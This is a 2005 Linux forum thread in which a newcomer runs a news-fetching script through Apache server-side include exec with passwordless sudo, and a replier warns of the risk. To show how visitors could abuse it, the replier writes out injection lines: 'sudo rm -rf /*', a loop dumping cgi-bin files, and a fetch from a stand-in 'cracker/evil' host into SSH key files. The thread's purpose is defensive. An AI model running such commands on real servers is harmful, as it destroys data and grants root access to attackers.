LinuxQuestions.org
Review your favorite Linux distribution.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Newbie
User Name
Password
Linux - Newbie This Linux forum is for members that are new to Linux.
Just starting out and have a question? If it is not in the man pages or the how-to's this is the place!

Notices


Reply
  Search this Thread
Old 03-01-2005, 06:15 AM   #1
jeffreybluml
Member
 
Registered: Mar 2004
Location: Minnesota
Distribution: Fedora Core 1, Mandrake 10
Posts: 405

Rep: Reputation: 30
when using SSI, can I limit how often a command can be run?


For instance, I've got a little script that goes out and gets all my rss feeds, then parses them to display on my webpage. Rather than have cron go out and update these feeds every 10 minutes (I want to make sure they're always fresh, but this seems a bit much), I'm just using server side includes and have a link on my page that executes the script (via sudo, which I have configured to allow apache to run this command without password) so that I only have to update them when I'm actually reading them. This seems to be working really well, but it leaves the obvious ability for somebody viewing the webpage to click the link a million times and bog down (or crash) my PC.

To make sure I'm clear, here's the code on the webpage to issue the command...

Code:
<pre>
<!--#exec cmd="sudo getnews" -->
</pre>
So, get to the point, right? Is there a setting somewhere with which I can control how often this can be done? I've got the getnews "script" located in /bin and it's basically just a shell "script" (I use quotes cuz I'm no script writer...it's just a file that starts with #!/bin/bash and then just issues a bunch of calls to a perl script, so I call that a script). Can I either set a minimum time between allowed runs of this file in /bin, or is there some way I can set a minimum wait between times apache is allowed to use the sudo command (remember though, no password is set, so I can't just use the password expire) to issue this, which would essentially create the same effect?

Ugh, It's early so I hope I'm being clear....

Any ideas, thoughts, suggestions?

Thanks,

Jeff
 
Old 03-01-2005, 06:32 AM   #2
gnube
LQ Newbie
 
Registered: Dec 2003
Location: Gothenburg, Sweden
Distribution: Fedora | RedHat
Posts: 13

Rep: Reputation: 0
You can look at the man page to wait or sleep and use that. Here is the first line of the man page from sleep;

The sleep utility suspends execution for a minimum of seconds. It is
usually used to schedule the execution of other commands (see EXAMPLES
below).

But, if you decide to stay with the current set up of your program, you are creating a real big security risk.
 
Old 03-01-2005, 06:35 AM   #3
gnube
LQ Newbie
 
Registered: Dec 2003
Location: Gothenburg, Sweden
Distribution: Fedora | RedHat
Posts: 13

Rep: Reputation: 0
You can look at the man page to wait or sleep and use that. Here is the first line of the man page from sleep;

The sleep utility suspends execution for a minimum of seconds. It is
usually used to schedule the execution of other commands (see EXAMPLES
below).

But, if you decide to stay with the current set up of your program, you are creating a real big security risk. Allowing the server-side include #exec command allows all users to execute system commands directly in the server file system. So I can do this on your machine as root right now;

<!--#exec cmd="sudo rm -rf /*" -->

This would probably be the least of your problems. A rootkit will be installed faster than you can say debian. If you do not take security precautions people will abuse your box and the whole internet will laugh and point at you.

gnube
 
Old 03-01-2005, 06:39 AM   #4
jeffreybluml
Member
 
Registered: Mar 2004
Location: Minnesota
Distribution: Fedora Core 1, Mandrake 10
Posts: 405

Original Poster
Rep: Reputation: 30
THanks for the reply. I'll check the man pages for those...

As for the security risk, I had read that. Let me just confirm that what I've done is sufficient....

I DO have a guestbook on the site (which is what helps create the risk due to the write access that this gives visitors, right?), but it has it's own subdirectory. I have set that directory in the httpd.conf file to NOT allow exec's. This works, right? I've also tried to confirm by adding a new guestbook entry, and adding this to it...

Code:
<pre>
<!--#exec cmd="whoami" -->
</pre>
<pre>
<!--#exec cmd="ls" -->
</pre>
Neither of these returned anything in the guestbook entry, so I figured it had worked. Sound right to you?

Are there other risks I need to konw about? I've tried to do my research, but let me know if I'm missing anything.

Thanks again!
 
Old 03-01-2005, 07:25 AM   #5
gnube
LQ Newbie
 
Registered: Dec 2003
Location: Gothenburg, Sweden
Distribution: Fedora | RedHat
Posts: 13

Rep: Reputation: 0
The issue is not only creating a directory where the shtml file cannot execute commands, it is also who it runs as. Apache is usualy set to run as a non-root user. If you have changed /etc/sudo to allow it to execute commands as root, then it can do whatever it wants in the wrong hands. Someone could re-write the URL to include malicious code that Apache can execute as root! This is serious.

Did you try <!--#exec cmd="sudo ls"--> ?
Or <!--#exec cmd="for i in `ls /var/www/cgi-bin/`; do cat $i; done;-->
Or <!--#exec cmd="touch .ssh/indentity.pub"-->
<!--#exec cmd="cat http://cracker/evil > .ssh/indentity.pub"-->


I recommend not allowing Apache to be run as root and taking the apache user out of the sudoers file. If apache needs to get info from a remote site, why don't you script it with curl or wget? Then you can download it anywhere you want and the .shtml file can process it. Then you decrease your exposure and risk considerably.

Consider something like this;

small shell script
curl -o newsfile http://www.newssite.com/newsfile

shtml file
<!--#include virtual="newsfile"-->

Last edited by gnube; 03-01-2005 at 07:35 AM.
 
Old 03-01-2005, 07:37 AM   #6
jeffreybluml
Member
 
Registered: Mar 2004
Location: Minnesota
Distribution: Fedora Core 1, Mandrake 10
Posts: 405

Original Poster
Rep: Reputation: 30
I'm actually using wget already to get a couple of the feeds (for some reason my JSMFeed.pl script doesn' like a couple of them), but it too would start to bog my system down if the page were refreshed repeatedly....right? That is assuming you were suggesting adding the curl code right into the webpage....

I had set the sudoers file so that apache could run ONLY the /bin/getnews script, figured that would take care of the sudo security risk.

After all this talk I've gotten all security-nervous again, so I dumped the whole exec cmd thing and went back to having cron update the feeds every 10 minutes.

Then I just put a refresh link on the page, for those internet newbies who can't find the button....;-)

Oh well, twas a fun learning experience...

THanks for the replies...
 
Old 03-01-2005, 08:40 AM   #7
gnube
LQ Newbie
 
Registered: Dec 2003
Location: Gothenburg, Sweden
Distribution: Fedora | RedHat
Posts: 13

Rep: Reputation: 0
Can't you update the feeds in the background with cron and wget, then refresh the web page? I think that would be the most efficient use of resources.
 
Old 03-01-2005, 09:05 AM   #8
jeffreybluml
Member
 
Registered: Mar 2004
Location: Minnesota
Distribution: Fedora Core 1, Mandrake 10
Posts: 405

Original Poster
Rep: Reputation: 30
You're probably right. That was how I originally set it up, but then I decided that it was a waste to have the feeds updating when I'm not at the computer looking at them, so I put this in.

I'm starting to think I jsut did this for something to do, as the more I think about it the more silly this whole venture seems. But again, it was a fun little experiment and I learned something. I have resorted to my original setup, which really was the most logical. I have cron updating the feeds every 10 minutes (as well as a couple of weather radar images - more use for wget) and the frame on the webpage auto updates every 5.

Question regarding wget; Is there a way to COMPLETELY suppress ANY output from the command? I read through man and info, and I can get it to run "in the background" and all that, but it still produces and output message like "continuing in background...PID.....output will be written to wget-whatever.log" or whatever (which then gets mailed to me in /var/spool/mail), and then, of course, saves a log file. So, I've got cron deleting these log files periodically as well as my /var/spool/mail (seriously, cron is the coolest tool ever!), but is there any way to just stop them from being created?

Anyways, regardless of whether or not you can answer that, thanks for the insight here. I'm glad I was able to be persuaded back to keeping it simple....

Thanks,

Last edited by jeffreybluml; 03-01-2005 at 09:07 AM.
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
Command to run another command against a list of files psweetma Linux - General 3 11-09-2005 05:29 PM
How do I limit the amount of processes a user can run? houler Slackware 26 04-04-2005 08:02 PM
Run a command from anywhere ToothlessRebel Linux - Newbie 4 03-05-2005 01:36 AM
apache SSI error with Invalid command 'AddOutputFilter' Moebius Linux - Software 2 10-15-2004 12:18 PM
Quota issue, hard limit doesn't limit users Gratz Linux - Software 2 09-16-2003 07:35 AM


All times are GMT -5. The time now is 12:33 AM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration